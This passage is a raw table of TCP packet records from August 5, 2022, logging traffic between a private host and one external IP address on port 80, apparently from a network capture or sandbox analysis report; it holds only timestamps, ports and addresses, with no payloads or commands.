Aug 5, 2022 13:54:18.991784096 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.991812944 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.991826057 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.991856098 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.991856098 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.991899967 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.991899014 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.991944075 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.991945982 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.991986036 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.991988897 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.992024899 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.992032051 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.992074013 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.992074966 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.992114067 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.992117882 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.992165089 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.992166996 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.992206097 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.992207050 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.992249012 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.992250919 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.992291927 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.992295027 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.992336035 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.992337942 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.992377996 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.992378950 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.992419004 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.992423058 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.992465019 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.992466927 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.992511988 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.992513895 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.992552996 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.992552996 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.992594957 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.992594957 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.992638111 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.992641926 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.992680073 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.992681026 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.992722988 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.992723942 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.992764950 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.992768049 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.992805958 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.992808104 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.992851019 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.992851973 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.992896080 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.992896080 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.992937088 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.992939949 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.992980003 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.992981911 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.993021965 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.993024111 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.993062973 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.993066072 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.993107080 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.993108034 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.993149996 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.993153095 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.993191957 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.993192911 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.993232012 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.993232965 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.993274927 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.993274927 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.993315935 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.993318081 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.993355036 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.993355989 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.993395090 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.993396997 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.993437052 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.993438005 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.993479967 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.993480921 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.993524075 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.993525982 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.993562937 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.993562937 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.993601084 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.993604898 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.993643999 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.993644953 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.993685961 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.993686914 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.993726015 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.993727922 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.993767977 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.993768930 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.993808985 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.993812084 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.993851900 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.993853092 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.993891954 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.993892908 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.993932962 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.993933916 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.993974924 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.993974924 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.994014978 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.994015932 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.994057894 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.994059086 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.994098902 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.994100094 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.994139910 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.994141102 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.994182110 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.994184971 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.994225025 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.994225025 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.994266033 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.994266033 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.994308949 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.994308949 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.994350910 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.994354010 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.994391918 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.994395018 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.994430065 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.994432926 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.994473934 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.994474888 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.994520903 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.994525909 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.994546890 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.994576931 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.994587898 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.994599104 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.994627953 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.994630098 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.994672060 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.994680882 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.994714022 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.019040108 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.019088984 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.019124985 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.019157887 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.019176960 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.019195080 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.019207001 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.019232988 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.019253016 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.019268990 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.019273996 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.019304991 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.019313097 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.019342899 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.019373894 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.019406080 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.019408941 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.019458055 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.019467115 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.019512892 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.019539118 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.019551039 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.019561052 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.019602060 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.019603014 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.019635916 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.019644976 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.019682884 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.019685984 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.019727945 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.019728899 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.019769907 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.019773006 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.019809008 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.019809961 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.019851923 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.019853115 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.019891977 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.019892931 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.019929886 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.019933939 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.019970894 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.019974947 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.020013094 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.020015955 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.020051956 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.023850918 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.023916006 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.023958921 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.023988962 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.023998976 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.024029970 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.024045944 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.024080992 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.024089098 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.024116993 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.024128914 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.024139881 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.024171114 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.024172068 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.024213076 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.024215937 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.024255037 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.024262905 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.024302959 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.046624899 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.046986103 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.432562113 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.484570980 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.484616041 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.484646082 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.484667063 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.484699011 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.484711885 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.484730005 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.484741926 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.484746933 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.484750986 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.484759092 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.484762907 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.484793901 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.484822989 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.484823942 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.484849930 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.484853983 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.484853983 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.484882116 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.484915972 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.494321108 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.494376898 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.494412899 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.494445086 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.494482994 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.494517088 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.494523048 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.494551897 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.494551897 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.494591951 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.494630098 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.494642973 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.494652033 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.494654894 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.494672060 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.494683027 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.494712114 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.494750977 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.494757891 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.494784117 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.494790077 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.494797945 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.494828939 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.494864941 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.494867086 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.494877100 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.494903088 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.494911909 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.494942904 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.494954109 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.494981050 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.494992971 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.495021105 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.495034933 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.495059013 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.495070934 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.495100975 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.495107889 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.495151043 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.503987074 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.504044056 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.504090071 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.504132986 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.504173040 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.504195929 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.504214048 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.504230022 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.504240990 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.504259109 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.504296064 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.504300117 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.504319906 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.504343033 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.504353046 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.504384041 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.504395962 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.504426956 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.504435062 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.504468918 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.504475117 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.504508018 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.504523039 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.504549026 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.504560947 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.504594088 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.504611969 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.504632950 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.504653931 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.504674911 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.504687071 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.504715919 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.504736900 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.504761934 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.514045954 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.514127016 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.514168024 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.514209986 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.514251947 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.514280081 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.514293909 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.514318943 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.514324903 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.514338017 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.514355898 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.514380932 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.514405966 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.514420986 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.514461040 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.514461994 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.514496088 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.514503956 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.514512062 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.514544964 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.514554977 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.514588118 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.514599085 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.514628887 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.514648914 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.514668941 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.514682055 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.514708996 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.514719963 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.514750004 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.514760971 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.514791012 CEST	80	49778	51.195.166.178	192.168.2.4
